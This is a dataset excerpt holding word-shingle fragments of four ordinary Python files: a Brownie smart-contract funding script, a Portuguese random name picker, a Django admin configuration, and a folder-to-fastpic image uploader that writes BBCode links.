Column: ngram (lists of strings; list lengths range from 0 to 82k). Each row holds the overlapping word shingles of one source file; per row, the shingles reassemble into the source text shown below.
[ "\"value\": entrance_fee}) def withdraw(): fund_me = FundMe[-1] account = get_account()", "print(f\"entrance is {entrance_fee}\") print(\"funding..\") fund_me.fund({\"from\": account, \"value\": entrance_fee}) def withdraw():", "= FundMe[-1] account = get_account() fund_me.withdraw({\"from\": account}) def main(): fund()", "= get_account() fund_me.withdraw({\"from\": account}) def main(): fund() withdraw() if __name__", "fund(): fund_me = FundMe[-1] account = get_account() entrance_fee = fund_me.getEntranceFee()", "import FundMe from scripts.helpful_scripts import get_account def fund(): fund_me =", "account, \"value\": entrance_fee}) def withdraw(): fund_me = FundMe[-1] account =", "FundMe[-1] account = get_account() entrance_fee = fund_me.getEntranceFee() print(f\"entrance is {entrance_fee}\")", "FundMe from scripts.helpful_scripts import get_account def fund(): fund_me = FundMe[-1]", "def withdraw(): fund_me = FundMe[-1] account = get_account() fund_me.withdraw({\"from\": account})", "print(\"funding..\") fund_me.fund({\"from\": account, \"value\": entrance_fee}) def withdraw(): fund_me = FundMe[-1]", "fund_me.getEntranceFee() print(f\"entrance is {entrance_fee}\") print(\"funding..\") fund_me.fund({\"from\": account, \"value\": entrance_fee}) def", "from brownie import FundMe from scripts.helpful_scripts import get_account def fund():", "import get_account def fund(): fund_me = FundMe[-1] account = get_account()", "is {entrance_fee}\") print(\"funding..\") fund_me.fund({\"from\": account, \"value\": entrance_fee}) def withdraw(): fund_me", "account}) def main(): fund() withdraw() if __name__ == \"__main__\": main()", "= FundMe[-1] account = get_account() entrance_fee = fund_me.getEntranceFee() print(f\"entrance is", "fund_me = FundMe[-1] account = get_account() fund_me.withdraw({\"from\": account}) def main():", "{entrance_fee}\") print(\"funding..\") fund_me.fund({\"from\": account, \"value\": entrance_fee}) def withdraw(): fund_me =", "get_account def fund(): fund_me = FundMe[-1] account = get_account() entrance_fee", "account = get_account() fund_me.withdraw({\"from\": account}) def main(): fund() withdraw() if", "def fund(): fund_me = FundMe[-1] account = get_account() entrance_fee =", "withdraw(): fund_me = FundMe[-1] account = get_account() fund_me.withdraw({\"from\": account}) def", "scripts.helpful_scripts import get_account def fund(): fund_me = FundMe[-1] account =", "get_account() entrance_fee = fund_me.getEntranceFee() print(f\"entrance is {entrance_fee}\") print(\"funding..\") fund_me.fund({\"from\": account,", "FundMe[-1] account = get_account() fund_me.withdraw({\"from\": account}) def main(): fund() withdraw()", "fund_me.fund({\"from\": account, \"value\": entrance_fee}) def withdraw(): fund_me = FundMe[-1] account", "brownie import FundMe from scripts.helpful_scripts import get_account def fund(): fund_me", "fund_me.withdraw({\"from\": account}) def main(): fund() withdraw() if __name__ == \"__main__\":", "entrance_fee = fund_me.getEntranceFee() print(f\"entrance is {entrance_fee}\") print(\"funding..\") fund_me.fund({\"from\": account, \"value\":", "entrance_fee}) def withdraw(): fund_me = FundMe[-1] account = get_account() fund_me.withdraw({\"from\":", "= get_account() entrance_fee = fund_me.getEntranceFee() print(f\"entrance is {entrance_fee}\") print(\"funding..\") fund_me.fund({\"from\":", "account = get_account() entrance_fee = fund_me.getEntranceFee() print(f\"entrance is {entrance_fee}\") print(\"funding..\")", "fund_me = FundMe[-1] account = get_account() 
entrance_fee = fund_me.getEntranceFee() print(f\"entrance", "= fund_me.getEntranceFee() print(f\"entrance is {entrance_fee}\") print(\"funding..\") fund_me.fund({\"from\": account, \"value\": entrance_fee})", "get_account() fund_me.withdraw({\"from\": account}) def main(): fund() withdraw() if __name__ ==", "from scripts.helpful_scripts import get_account def fund(): fund_me = FundMe[-1] account" ]
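The script above depends on a get_account() helper that the row does not include. Below is a minimal sketch of what scripts/helpful_scripts.py often looks like in this Brownie pattern; the network names, account index, and config keys are assumptions, not recovered from the row:

from brownie import accounts, config, network

LOCAL_BLOCKCHAIN_ENVIRONMENTS = ["development", "ganache-local"]  # assumed names


def get_account():
    # On a local test chain, use a pre-funded test account; otherwise load a
    # private key from brownie-config.yaml (hypothetical config layout).
    if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS:
        return accounts[0]
    return accounts.add(config["wallets"]["from_key"])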
[ "um programa que ajude ele, lendo o nome dos alunos", "= input('Digite mais um nome: ') nome4 = input('Digite o", "último nome: ') nome = [nome1, nome2, nome3, nome4] print(choice(nome))", "nome3 = input('Digite mais um nome: ') nome4 = input('Digite", "') nome3 = input('Digite mais um nome: ') nome4 =", "sortear um dos seus quatro alunos para apagar o quadro.", "seus quatro alunos para apagar o quadro. Faça um programa", "escrevendo na tela o nome do escolhido. from random import", "e escrevendo na tela o nome do escolhido. from random", "random import choice nome1 = input('Digite um nome: ') nome2", "lendo o nome dos alunos e escrevendo na tela o", "dos seus quatro alunos para apagar o quadro. Faça um", "input('Digite mais um nome: ') nome4 = input('Digite o último", "outro nome: ') nome3 = input('Digite mais um nome: ')", "= input('Digite um nome: ') nome2 = input('Digite outro nome:", "ele, lendo o nome dos alunos e escrevendo na tela", "choice nome1 = input('Digite um nome: ') nome2 = input('Digite", "um nome: ') nome2 = input('Digite outro nome: ') nome3", "nome: ') nome4 = input('Digite o último nome: ') nome", "input('Digite o último nome: ') nome = [nome1, nome2, nome3,", "# Um professor quer sortear um dos seus quatro alunos", "= input('Digite outro nome: ') nome3 = input('Digite mais um", "nome: ') nome3 = input('Digite mais um nome: ') nome4", "o quadro. Faça um programa que ajude ele, lendo o", "Faça um programa que ajude ele, lendo o nome dos", "dos alunos e escrevendo na tela o nome do escolhido.", "um dos seus quatro alunos para apagar o quadro. Faça", "que ajude ele, lendo o nome dos alunos e escrevendo", "na tela o nome do escolhido. from random import choice", "quadro. Faça um programa que ajude ele, lendo o nome", "para apagar o quadro. Faça um programa que ajude ele,", "import choice nome1 = input('Digite um nome: ') nome2 =", "quatro alunos para apagar o quadro. Faça um programa que", "nome: ') nome2 = input('Digite outro nome: ') nome3 =", "nome do escolhido. from random import choice nome1 = input('Digite", "mais um nome: ') nome4 = input('Digite o último nome:", "tela o nome do escolhido. from random import choice nome1", "um nome: ') nome4 = input('Digite o último nome: ')", "ajude ele, lendo o nome dos alunos e escrevendo na", "Um professor quer sortear um dos seus quatro alunos para", "o nome dos alunos e escrevendo na tela o nome", "from random import choice nome1 = input('Digite um nome: ')", "input('Digite um nome: ') nome2 = input('Digite outro nome: ')", "') nome2 = input('Digite outro nome: ') nome3 = input('Digite", "o último nome: ') nome = [nome1, nome2, nome3, nome4]", "apagar o quadro. Faça um programa que ajude ele, lendo", "nome dos alunos e escrevendo na tela o nome do", "o nome do escolhido. from random import choice nome1 =", "nome1 = input('Digite um nome: ') nome2 = input('Digite outro", "= input('Digite o último nome: ') nome = [nome1, nome2,", "do escolhido. from random import choice nome1 = input('Digite um", "programa que ajude ele, lendo o nome dos alunos e", "') nome4 = input('Digite o último nome: ') nome =", "nome2 = input('Digite outro nome: ') nome3 = input('Digite mais", "input('Digite outro nome: ') nome3 = input('Digite mais um nome:", "alunos e escrevendo na tela o nome do escolhido. from", "alunos para apagar o quadro. Faça um programa que ajude", "nome4 = input('Digite o último nome: ') nome = [nome1,", "quer sortear um dos seus quatro alunos para apagar o", "escolhido. 
from random import choice nome1 = input('Digite um nome:", "professor quer sortear um dos seus quatro alunos para apagar" ]
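An equivalent loop-based variant (an editorial sketch, not part of the row) that avoids the four numbered variables by collecting the names into a list directly:

from random import choice

# Read the four names in a loop; choice() then picks one uniformly at random.
nomes = [input('Digite um nome: ') for _ in range(4)]
print(choice(nomes))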
[ "search_fields = ('name', 'last_name', 'phone') list_editable = ('phone', 'show') admin.site.register(Categoria)", "'last_name', 'phone', 'email', 'creation_date', 'categoria', 'show') list_display_links = ('id', 'name',", "= 10 search_fields = ('name', 'last_name', 'phone') list_editable = ('phone',", "('id', 'name', 'last_name', 'phone', 'email', 'creation_date', 'categoria', 'show') list_display_links =", "list_per_page = 10 search_fields = ('name', 'last_name', 'phone') list_editable =", "'phone', 'email', 'creation_date', 'categoria', 'show') list_display_links = ('id', 'name', 'last_name')", "= ('name', 'last_name', 'phone') list_editable = ('phone', 'show') admin.site.register(Categoria) admin.site.register(Contact,", "list_filter = ('categoria',) list_per_page = 10 search_fields = ('name', 'last_name',", "from .models import Categoria, Contact class ContactAdmin(admin.ModelAdmin): list_display = ('id',", "'last_name') list_filter = ('categoria',) list_per_page = 10 search_fields = ('name',", "import admin from .models import Categoria, Contact class ContactAdmin(admin.ModelAdmin): list_display", "Categoria, Contact class ContactAdmin(admin.ModelAdmin): list_display = ('id', 'name', 'last_name', 'phone',", "<filename>contacts/admin.py from django.contrib import admin from .models import Categoria, Contact", "'show') list_display_links = ('id', 'name', 'last_name') list_filter = ('categoria',) list_per_page", "('id', 'name', 'last_name') list_filter = ('categoria',) list_per_page = 10 search_fields", "= ('id', 'name', 'last_name', 'phone', 'email', 'creation_date', 'categoria', 'show') list_display_links", "'categoria', 'show') list_display_links = ('id', 'name', 'last_name') list_filter = ('categoria',)", "list_display_links = ('id', 'name', 'last_name') list_filter = ('categoria',) list_per_page =", "10 search_fields = ('name', 'last_name', 'phone') list_editable = ('phone', 'show')", "django.contrib import admin from .models import Categoria, Contact class ContactAdmin(admin.ModelAdmin):", "('name', 'last_name', 'phone') list_editable = ('phone', 'show') admin.site.register(Categoria) admin.site.register(Contact, ContactAdmin)", "Contact class ContactAdmin(admin.ModelAdmin): list_display = ('id', 'name', 'last_name', 'phone', 'email',", "'creation_date', 'categoria', 'show') list_display_links = ('id', 'name', 'last_name') list_filter =", ".models import Categoria, Contact class ContactAdmin(admin.ModelAdmin): list_display = ('id', 'name',", "'name', 'last_name', 'phone', 'email', 'creation_date', 'categoria', 'show') list_display_links = ('id',", "('categoria',) list_per_page = 10 search_fields = ('name', 'last_name', 'phone') list_editable", "class ContactAdmin(admin.ModelAdmin): list_display = ('id', 'name', 'last_name', 'phone', 'email', 'creation_date',", "import Categoria, Contact class ContactAdmin(admin.ModelAdmin): list_display = ('id', 'name', 'last_name',", "list_display = ('id', 'name', 'last_name', 'phone', 'email', 'creation_date', 'categoria', 'show')", "admin from .models import Categoria, Contact class ContactAdmin(admin.ModelAdmin): list_display =", "= ('id', 'name', 'last_name') list_filter = ('categoria',) list_per_page = 10", "'email', 'creation_date', 'categoria', 'show') list_display_links = ('id', 'name', 'last_name') list_filter", "'name', 'last_name') list_filter = ('categoria',) list_per_page = 10 search_fields =", "ContactAdmin(admin.ModelAdmin): list_display = ('id', 'name', 'last_name', 'phone', 'email', 'creation_date', 'categoria',", "= 
('categoria',) list_per_page = 10 search_fields = ('name', 'last_name', 'phone')", "from django.contrib import admin from .models import Categoria, Contact class" ]
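The admin options above imply a Contact model with matching fields. A hypothetical sketch of contacts/models.py follows; the field types and the Categoria field are guesses inferred from list_display, not recovered from the row:

from django.db import models
from django.utils import timezone


class Categoria(models.Model):
    nome = models.CharField(max_length=255)  # assumed field


class Contact(models.Model):
    # Field names mirror the admin's list_display; types are assumptions.
    name = models.CharField(max_length=255)
    last_name = models.CharField(max_length=255, blank=True)
    phone = models.CharField(max_length=255)
    email = models.EmailField(blank=True)
    creation_date = models.DateTimeField(default=timezone.now)
    categoria = models.ForeignKey(Categoria, on_delete=models.DO_NOTHING)
    show = models.BooleanField(default=True)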
[ "_n_jobs_for_upload = 20 _root_folders_set = ( '/path/to/folder', ) _spoiler_for_each_file =", "= {} tmp_dir = tempfile.mkdtemp() try: sub_results = Parallel(n_jobs=_n_jobs_for_upload, backend='threading')(", "continue file_path = os.path.join(root, file) pics_to_upload[file] = file_path print(pics_to_upload) print('Need", "link = result[result_key] codes_file.write('[url={}][img]{}[/img][/url]'.format(link, url)) if _spoiler_for_each_file: codes_file.write(os.linesep) codes_file.write('[/spoiler]') codes_file.write(os.linesep)", "file_path = os.path.join(root, file) pics_to_upload[file] = file_path print(pics_to_upload) print('Need upload", "finished = datetime.datetime.now() print(finished, 'all done in', finished - started)", "in os.walk(folder_path): for file in files: if file.split('.')[-1] not in", "if file.split('.')[-1] not in ('jpg', 'jpeg', 'bmp', 'png'): continue file_path", "delayed from fastpic_upload import upload_file_to_fastpic _n_jobs_for_upload = 20 _root_folders_set =", "codes_file.write('[spoiler=\"Скриншоты\"]') codes_file.write(os.linesep) codes_file.write(os.linesep) for result_key in sorted(result): if _spoiler_for_each_file: codes_file.write('[spoiler=\"{}\"]'.format(result_key))", "print_result_to_file(result, os.path.join(root_folder, 'result_codes.txt')) if __name__ == '__main__': started = datetime.datetime.now()", "codes_file.write(os.linesep) codes_file.write('[/spoiler]') def main(): for root_folder in _root_folders_set: result =", "result = upload_from_folder(root_folder) print_result_to_file(result, os.path.join(root_folder, 'result_codes.txt')) if __name__ == '__main__':", "file) pics_to_upload[file] = file_path print(pics_to_upload) print('Need upload {} photo'.format(len(pics_to_upload))) result", "'result_codes.txt')) if __name__ == '__main__': started = datetime.datetime.now() print(started, 'started')", "joblib import Parallel, delayed from fastpic_upload import upload_file_to_fastpic _n_jobs_for_upload =", "tmp_dir) print(pic_url) return result_key, (pic_url, pic_link) def upload_from_folder(folder_path): pics_to_upload =", "pic_link) def upload_from_folder(folder_path): pics_to_upload = {} for root, dirs, files", "encoding='utf8', newline='') as codes_file: codes_file.write('[spoiler=\"Скриншоты\"]') codes_file.write(os.linesep) codes_file.write(os.linesep) for result_key in", "print(pics_to_upload) print('Need upload {} photo'.format(len(pics_to_upload))) result = {} tmp_dir =", "open(result_file_path, 'w', encoding='utf8', newline='') as codes_file: codes_file.write('[spoiler=\"Скриншоты\"]') codes_file.write(os.linesep) codes_file.write(os.linesep) for", "_spoiler_for_each_file = True def process_one_pic(result_key, pic_path, tmp_dir): pic_url, pic_link =", "pic_path, tmp_dir): pic_url, pic_link = upload_file_to_fastpic(pic_path, tmp_dir) print(pic_url) return result_key,", "files in os.walk(folder_path): for file in files: if file.split('.')[-1] not", "shutil.rmtree(tmp_dir) return result def print_result_to_file(result, result_file_path): with open(result_file_path, 'w', encoding='utf8',", "pics_to_upload = {} for root, dirs, files in os.walk(folder_path): for", "'bmp', 'png'): continue file_path = os.path.join(root, file) pics_to_upload[file] = file_path", "for root_folder in _root_folders_set: result = upload_from_folder(root_folder) print_result_to_file(result, os.path.join(root_folder, 'result_codes.txt'))", "datetime.datetime.now() print(started, 'started') main() finished = datetime.datetime.now() print(finished, 'all done", 
"_root_folders_set = ( '/path/to/folder', ) _spoiler_for_each_file = True def process_one_pic(result_key,", "'started') main() finished = datetime.datetime.now() print(finished, 'all done in', finished", "key in sorted(pics_to_upload)) for sub_result in sub_results: result[sub_result[0]] = sub_result[1]", "os.walk(folder_path): for file in files: if file.split('.')[-1] not in ('jpg',", "( '/path/to/folder', ) _spoiler_for_each_file = True def process_one_pic(result_key, pic_path, tmp_dir):", "upload_file_to_fastpic _n_jobs_for_upload = 20 _root_folders_set = ( '/path/to/folder', ) _spoiler_for_each_file", "tmp_dir): pic_url, pic_link = upload_file_to_fastpic(pic_path, tmp_dir) print(pic_url) return result_key, (pic_url,", "{} tmp_dir = tempfile.mkdtemp() try: sub_results = Parallel(n_jobs=_n_jobs_for_upload, backend='threading')( delayed(process_one_pic)(key,", "codes_file.write('[/spoiler]') codes_file.write(os.linesep) codes_file.write(os.linesep) codes_file.write('[/spoiler]') def main(): for root_folder in _root_folders_set:", "codes_file.write(os.linesep) codes_file.write('[/spoiler]') codes_file.write(os.linesep) codes_file.write(os.linesep) codes_file.write('[/spoiler]') def main(): for root_folder in", "Parallel, delayed from fastpic_upload import upload_file_to_fastpic _n_jobs_for_upload = 20 _root_folders_set", "pic_url, pic_link = upload_file_to_fastpic(pic_path, tmp_dir) print(pic_url) return result_key, (pic_url, pic_link)", "for sub_result in sub_results: result[sub_result[0]] = sub_result[1] finally: shutil.rmtree(tmp_dir) return", "root_folder in _root_folders_set: result = upload_from_folder(root_folder) print_result_to_file(result, os.path.join(root_folder, 'result_codes.txt')) if", "upload {} photo'.format(len(pics_to_upload))) result = {} tmp_dir = tempfile.mkdtemp() try:", "result_key, (pic_url, pic_link) def upload_from_folder(folder_path): pics_to_upload = {} for root,", "result[sub_result[0]] = sub_result[1] finally: shutil.rmtree(tmp_dir) return result def print_result_to_file(result, result_file_path):", "started = datetime.datetime.now() print(started, 'started') main() finished = datetime.datetime.now() print(finished,", "= Parallel(n_jobs=_n_jobs_for_upload, backend='threading')( delayed(process_one_pic)(key, pics_to_upload[key], tmp_dir) for key in sorted(pics_to_upload))", "as codes_file: codes_file.write('[spoiler=\"Скриншоты\"]') codes_file.write(os.linesep) codes_file.write(os.linesep) for result_key in sorted(result): if", "if _spoiler_for_each_file: codes_file.write('[spoiler=\"{}\"]'.format(result_key)) codes_file.write(os.linesep) url, link = result[result_key] codes_file.write('[url={}][img]{}[/img][/url]'.format(link, url))", "fastpic_upload import upload_file_to_fastpic _n_jobs_for_upload = 20 _root_folders_set = ( '/path/to/folder',", "== '__main__': started = datetime.datetime.now() print(started, 'started') main() finished =", "finally: shutil.rmtree(tmp_dir) return result def print_result_to_file(result, result_file_path): with open(result_file_path, 'w',", "codes_file: codes_file.write('[spoiler=\"Скриншоты\"]') codes_file.write(os.linesep) codes_file.write(os.linesep) for result_key in sorted(result): if _spoiler_for_each_file:", "in ('jpg', 'jpeg', 'bmp', 'png'): continue file_path = os.path.join(root, file)", "in files: if file.split('.')[-1] not in ('jpg', 'jpeg', 'bmp', 'png'):", "= file_path print(pics_to_upload) print('Need upload {} photo'.format(len(pics_to_upload))) result = {}", "codes_file.write(os.linesep) url, link = 
result[result_key] codes_file.write('[url={}][img]{}[/img][/url]'.format(link, url)) if _spoiler_for_each_file: codes_file.write(os.linesep)", "main(): for root_folder in _root_folders_set: result = upload_from_folder(root_folder) print_result_to_file(result, os.path.join(root_folder,", "tmp_dir) for key in sorted(pics_to_upload)) for sub_result in sub_results: result[sub_result[0]]", "{} for root, dirs, files in os.walk(folder_path): for file in", "__name__ == '__main__': started = datetime.datetime.now() print(started, 'started') main() finished", "pics_to_upload[key], tmp_dir) for key in sorted(pics_to_upload)) for sub_result in sub_results:", "import shutil import tempfile from joblib import Parallel, delayed from", "files: if file.split('.')[-1] not in ('jpg', 'jpeg', 'bmp', 'png'): continue", "codes_file.write(os.linesep) for result_key in sorted(result): if _spoiler_for_each_file: codes_file.write('[spoiler=\"{}\"]'.format(result_key)) codes_file.write(os.linesep) url,", "def print_result_to_file(result, result_file_path): with open(result_file_path, 'w', encoding='utf8', newline='') as codes_file:", "True def process_one_pic(result_key, pic_path, tmp_dir): pic_url, pic_link = upload_file_to_fastpic(pic_path, tmp_dir)", "file.split('.')[-1] not in ('jpg', 'jpeg', 'bmp', 'png'): continue file_path =", "for key in sorted(pics_to_upload)) for sub_result in sub_results: result[sub_result[0]] =", "file in files: if file.split('.')[-1] not in ('jpg', 'jpeg', 'bmp',", "codes_file.write('[url={}][img]{}[/img][/url]'.format(link, url)) if _spoiler_for_each_file: codes_file.write(os.linesep) codes_file.write('[/spoiler]') codes_file.write(os.linesep) codes_file.write(os.linesep) codes_file.write('[/spoiler]') def", "tmp_dir = tempfile.mkdtemp() try: sub_results = Parallel(n_jobs=_n_jobs_for_upload, backend='threading')( delayed(process_one_pic)(key, pics_to_upload[key],", "backend='threading')( delayed(process_one_pic)(key, pics_to_upload[key], tmp_dir) for key in sorted(pics_to_upload)) for sub_result", "datetime import os import shutil import tempfile from joblib import", "upload_from_folder(folder_path): pics_to_upload = {} for root, dirs, files in os.walk(folder_path):", "from joblib import Parallel, delayed from fastpic_upload import upload_file_to_fastpic _n_jobs_for_upload", "('jpg', 'jpeg', 'bmp', 'png'): continue file_path = os.path.join(root, file) pics_to_upload[file]", "return result_key, (pic_url, pic_link) def upload_from_folder(folder_path): pics_to_upload = {} for", "if __name__ == '__main__': started = datetime.datetime.now() print(started, 'started') main()", "tempfile from joblib import Parallel, delayed from fastpic_upload import upload_file_to_fastpic", "import upload_file_to_fastpic _n_jobs_for_upload = 20 _root_folders_set = ( '/path/to/folder', )", "root, dirs, files in os.walk(folder_path): for file in files: if", "= tempfile.mkdtemp() try: sub_results = Parallel(n_jobs=_n_jobs_for_upload, backend='threading')( delayed(process_one_pic)(key, pics_to_upload[key], tmp_dir)", "process_one_pic(result_key, pic_path, tmp_dir): pic_url, pic_link = upload_file_to_fastpic(pic_path, tmp_dir) print(pic_url) return", "tempfile.mkdtemp() try: sub_results = Parallel(n_jobs=_n_jobs_for_upload, backend='threading')( delayed(process_one_pic)(key, pics_to_upload[key], tmp_dir) for", "photo'.format(len(pics_to_upload))) result = {} tmp_dir = tempfile.mkdtemp() try: sub_results =", "for result_key in sorted(result): if _spoiler_for_each_file: 
codes_file.write('[spoiler=\"{}\"]'.format(result_key)) codes_file.write(os.linesep) url, link", "with open(result_file_path, 'w', encoding='utf8', newline='') as codes_file: codes_file.write('[spoiler=\"Скриншоты\"]') codes_file.write(os.linesep) codes_file.write(os.linesep)", "os.path.join(root, file) pics_to_upload[file] = file_path print(pics_to_upload) print('Need upload {} photo'.format(len(pics_to_upload)))", "url)) if _spoiler_for_each_file: codes_file.write(os.linesep) codes_file.write('[/spoiler]') codes_file.write(os.linesep) codes_file.write(os.linesep) codes_file.write('[/spoiler]') def main():", "os.path.join(root_folder, 'result_codes.txt')) if __name__ == '__main__': started = datetime.datetime.now() print(started,", "for root, dirs, files in os.walk(folder_path): for file in files:", "Parallel(n_jobs=_n_jobs_for_upload, backend='threading')( delayed(process_one_pic)(key, pics_to_upload[key], tmp_dir) for key in sorted(pics_to_upload)) for", "= upload_from_folder(root_folder) print_result_to_file(result, os.path.join(root_folder, 'result_codes.txt')) if __name__ == '__main__': started", "import os import shutil import tempfile from joblib import Parallel,", "pic_link = upload_file_to_fastpic(pic_path, tmp_dir) print(pic_url) return result_key, (pic_url, pic_link) def", "= os.path.join(root, file) pics_to_upload[file] = file_path print(pics_to_upload) print('Need upload {}", "sub_result in sub_results: result[sub_result[0]] = sub_result[1] finally: shutil.rmtree(tmp_dir) return result", "(pic_url, pic_link) def upload_from_folder(folder_path): pics_to_upload = {} for root, dirs,", "codes_file.write(os.linesep) codes_file.write(os.linesep) codes_file.write('[/spoiler]') def main(): for root_folder in _root_folders_set: result", "print(pic_url) return result_key, (pic_url, pic_link) def upload_from_folder(folder_path): pics_to_upload = {}", "'w', encoding='utf8', newline='') as codes_file: codes_file.write('[spoiler=\"Скриншоты\"]') codes_file.write(os.linesep) codes_file.write(os.linesep) for result_key", "from fastpic_upload import upload_file_to_fastpic _n_jobs_for_upload = 20 _root_folders_set = (", "= 20 _root_folders_set = ( '/path/to/folder', ) _spoiler_for_each_file = True", "= ( '/path/to/folder', ) _spoiler_for_each_file = True def process_one_pic(result_key, pic_path,", "= datetime.datetime.now() print(started, 'started') main() finished = datetime.datetime.now() print(finished, 'all", "'jpeg', 'bmp', 'png'): continue file_path = os.path.join(root, file) pics_to_upload[file] =", "import Parallel, delayed from fastpic_upload import upload_file_to_fastpic _n_jobs_for_upload = 20", "result[result_key] codes_file.write('[url={}][img]{}[/img][/url]'.format(link, url)) if _spoiler_for_each_file: codes_file.write(os.linesep) codes_file.write('[/spoiler]') codes_file.write(os.linesep) codes_file.write(os.linesep) codes_file.write('[/spoiler]')", "if _spoiler_for_each_file: codes_file.write(os.linesep) codes_file.write('[/spoiler]') codes_file.write(os.linesep) codes_file.write(os.linesep) codes_file.write('[/spoiler]') def main(): for", "codes_file.write('[spoiler=\"{}\"]'.format(result_key)) codes_file.write(os.linesep) url, link = result[result_key] codes_file.write('[url={}][img]{}[/img][/url]'.format(link, url)) if _spoiler_for_each_file:", "for file in files: if file.split('.')[-1] not in ('jpg', 'jpeg',", "upload_file_to_fastpic(pic_path, tmp_dir) print(pic_url) return result_key, (pic_url, pic_link) def upload_from_folder(folder_path): pics_to_upload", "shutil import 
tempfile from joblib import Parallel, delayed from fastpic_upload", "result = {} tmp_dir = tempfile.mkdtemp() try: sub_results = Parallel(n_jobs=_n_jobs_for_upload,", "{} photo'.format(len(pics_to_upload))) result = {} tmp_dir = tempfile.mkdtemp() try: sub_results", "sorted(pics_to_upload)) for sub_result in sub_results: result[sub_result[0]] = sub_result[1] finally: shutil.rmtree(tmp_dir)", "result_file_path): with open(result_file_path, 'w', encoding='utf8', newline='') as codes_file: codes_file.write('[spoiler=\"Скриншоты\"]') codes_file.write(os.linesep)", "print('Need upload {} photo'.format(len(pics_to_upload))) result = {} tmp_dir = tempfile.mkdtemp()", "= {} for root, dirs, files in os.walk(folder_path): for file", "url, link = result[result_key] codes_file.write('[url={}][img]{}[/img][/url]'.format(link, url)) if _spoiler_for_each_file: codes_file.write(os.linesep) codes_file.write('[/spoiler]')", "file_path print(pics_to_upload) print('Need upload {} photo'.format(len(pics_to_upload))) result = {} tmp_dir", "sub_results = Parallel(n_jobs=_n_jobs_for_upload, backend='threading')( delayed(process_one_pic)(key, pics_to_upload[key], tmp_dir) for key in", "in sorted(pics_to_upload)) for sub_result in sub_results: result[sub_result[0]] = sub_result[1] finally:", "pics_to_upload[file] = file_path print(pics_to_upload) print('Need upload {} photo'.format(len(pics_to_upload))) result =", "_spoiler_for_each_file: codes_file.write(os.linesep) codes_file.write('[/spoiler]') codes_file.write(os.linesep) codes_file.write(os.linesep) codes_file.write('[/spoiler]') def main(): for root_folder", "'__main__': started = datetime.datetime.now() print(started, 'started') main() finished = datetime.datetime.now()", "newline='') as codes_file: codes_file.write('[spoiler=\"Скриншоты\"]') codes_file.write(os.linesep) codes_file.write(os.linesep) for result_key in sorted(result):", "delayed(process_one_pic)(key, pics_to_upload[key], tmp_dir) for key in sorted(pics_to_upload)) for sub_result in", "main() finished = datetime.datetime.now() print(finished, 'all done in', finished -", "print_result_to_file(result, result_file_path): with open(result_file_path, 'w', encoding='utf8', newline='') as codes_file: codes_file.write('[spoiler=\"Скриншоты\"]')", "_root_folders_set: result = upload_from_folder(root_folder) print_result_to_file(result, os.path.join(root_folder, 'result_codes.txt')) if __name__ ==", "result_key in sorted(result): if _spoiler_for_each_file: codes_file.write('[spoiler=\"{}\"]'.format(result_key)) codes_file.write(os.linesep) url, link =", "in sorted(result): if _spoiler_for_each_file: codes_file.write('[spoiler=\"{}\"]'.format(result_key)) codes_file.write(os.linesep) url, link = result[result_key]", "return result def print_result_to_file(result, result_file_path): with open(result_file_path, 'w', encoding='utf8', newline='')", "sorted(result): if _spoiler_for_each_file: codes_file.write('[spoiler=\"{}\"]'.format(result_key)) codes_file.write(os.linesep) url, link = result[result_key] codes_file.write('[url={}][img]{}[/img][/url]'.format(link,", "codes_file.write('[/spoiler]') def main(): for root_folder in _root_folders_set: result = upload_from_folder(root_folder)", "import tempfile from joblib import Parallel, delayed from fastpic_upload import", ") _spoiler_for_each_file = True def process_one_pic(result_key, pic_path, tmp_dir): pic_url, pic_link", "in _root_folders_set: result = upload_from_folder(root_folder) print_result_to_file(result, os.path.join(root_folder, 
'result_codes.txt')) if __name__", "upload_from_folder(root_folder) print_result_to_file(result, os.path.join(root_folder, 'result_codes.txt')) if __name__ == '__main__': started =", "result def print_result_to_file(result, result_file_path): with open(result_file_path, 'w', encoding='utf8', newline='') as", "def process_one_pic(result_key, pic_path, tmp_dir): pic_url, pic_link = upload_file_to_fastpic(pic_path, tmp_dir) print(pic_url)", "in sub_results: result[sub_result[0]] = sub_result[1] finally: shutil.rmtree(tmp_dir) return result def", "= result[result_key] codes_file.write('[url={}][img]{}[/img][/url]'.format(link, url)) if _spoiler_for_each_file: codes_file.write(os.linesep) codes_file.write('[/spoiler]') codes_file.write(os.linesep) codes_file.write(os.linesep)", "dirs, files in os.walk(folder_path): for file in files: if file.split('.')[-1]", "= sub_result[1] finally: shutil.rmtree(tmp_dir) return result def print_result_to_file(result, result_file_path): with", "20 _root_folders_set = ( '/path/to/folder', ) _spoiler_for_each_file = True def", "try: sub_results = Parallel(n_jobs=_n_jobs_for_upload, backend='threading')( delayed(process_one_pic)(key, pics_to_upload[key], tmp_dir) for key", "sub_results: result[sub_result[0]] = sub_result[1] finally: shutil.rmtree(tmp_dir) return result def print_result_to_file(result,", "'png'): continue file_path = os.path.join(root, file) pics_to_upload[file] = file_path print(pics_to_upload)", "print(started, 'started') main() finished = datetime.datetime.now() print(finished, 'all done in',", "= upload_file_to_fastpic(pic_path, tmp_dir) print(pic_url) return result_key, (pic_url, pic_link) def upload_from_folder(folder_path):", "def main(): for root_folder in _root_folders_set: result = upload_from_folder(root_folder) print_result_to_file(result,", "import datetime import os import shutil import tempfile from joblib", "def upload_from_folder(folder_path): pics_to_upload = {} for root, dirs, files in", "codes_file.write(os.linesep) codes_file.write(os.linesep) for result_key in sorted(result): if _spoiler_for_each_file: codes_file.write('[spoiler=\"{}\"]'.format(result_key)) codes_file.write(os.linesep)", "os import shutil import tempfile from joblib import Parallel, delayed", "sub_result[1] finally: shutil.rmtree(tmp_dir) return result def print_result_to_file(result, result_file_path): with open(result_file_path,", "not in ('jpg', 'jpeg', 'bmp', 'png'): continue file_path = os.path.join(root,", "_spoiler_for_each_file: codes_file.write('[spoiler=\"{}\"]'.format(result_key)) codes_file.write(os.linesep) url, link = result[result_key] codes_file.write('[url={}][img]{}[/img][/url]'.format(link, url)) if", "= True def process_one_pic(result_key, pic_path, tmp_dir): pic_url, pic_link = upload_file_to_fastpic(pic_path,", "'/path/to/folder', ) _spoiler_for_each_file = True def process_one_pic(result_key, pic_path, tmp_dir): pic_url," ]
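The fastpic_upload module itself is not in the row; the caller only assumes that upload_file_to_fastpic(pic_path, tmp_dir) returns a (direct image URL, page link) pair. A hypothetical offline stub with that contract, useful for dry-running the script without network access:

def upload_file_to_fastpic(pic_path, tmp_dir):
    # Stand-in that skips the real upload and echoes a local path in the
    # shape the caller expects: (direct image URL, page link).
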